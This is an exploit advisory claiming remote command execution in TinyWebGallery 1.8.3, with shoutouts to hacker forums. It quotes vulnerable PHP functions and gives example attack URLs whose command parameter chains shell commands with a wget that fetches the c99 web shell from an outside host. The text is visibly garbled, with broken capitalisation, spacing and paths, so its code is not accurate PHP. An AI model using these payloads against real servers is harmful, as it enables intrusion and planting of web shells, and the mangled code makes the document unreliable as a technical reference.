<======================================================== ====================>
[»] TinyWebGallery 1.8.3 Remote Command Execution
<======================================================== ====================>
Author: Explain 0! Ts --------> My Best t34m -----> "BaC, RoBert MilEs, Bl4ck_ID"
Address: http://www.tinywebgallery.com/dl.php? File = twg_latest
Test Platform wind xp
! -----> THnKs T0 My ALLAH
<::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::: :::::>
BIG tHnkS T0:-> vbspiders.com & Dz4all.com www.2cto.com & isecur1ty.org
<::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::: :::::>
<====================== E test ===============================>
-= [Vuln c0de] =-1
1) --------------> filefunctions. inc:
Function execute_command ($ command ){
Global $ use_shell_exec;
Ob_start ();
Set_error_handler ("on_error_no_output ");
I f (substr (@ php_uname (), 0, 7) = "Windows "){
// Make a new instance of the COM object
$ WshShell = new COM ("WScript. Shell ");
// Make the command window but dont show it.
$ OExec = $ WshShell-> Run ("cmd/C". $ command, 0, true );
} Else {
If ($ use_shell_exec ){
Shell_exec ($ command); <------------------------------------------------- error
1) ---------> example:
Http://www.bkjia.com/(patch)/inc/filefunctions. inc? Command = <id >;< pwd >;< wget http://shell.org/c99.zip>
-= [Vuln c0de] =-2
2) --------------> ifo. php:
If ($ use_shell_exec ){
Shell_exec ($ command );
} Else {
Exec ($ command. ">/dev/null"); <-------------------------------------------- error
2) ---------> example:
Http://www.bkjia.com/(patch)/info. php? Command = <id >;< pwd >;< wget http://shell.org/c99.zip>
<Certificate ------------------------------------>
Thanks:
!> BaC,!> Black_ID,!> Kala $ nikoV,!> Robert miles,!> Dr. Black_ID,!> AHmEd-HaMaImi, Bel-AiSa, To-haled
<Certificate ------------------------------------>
EnJoY o_O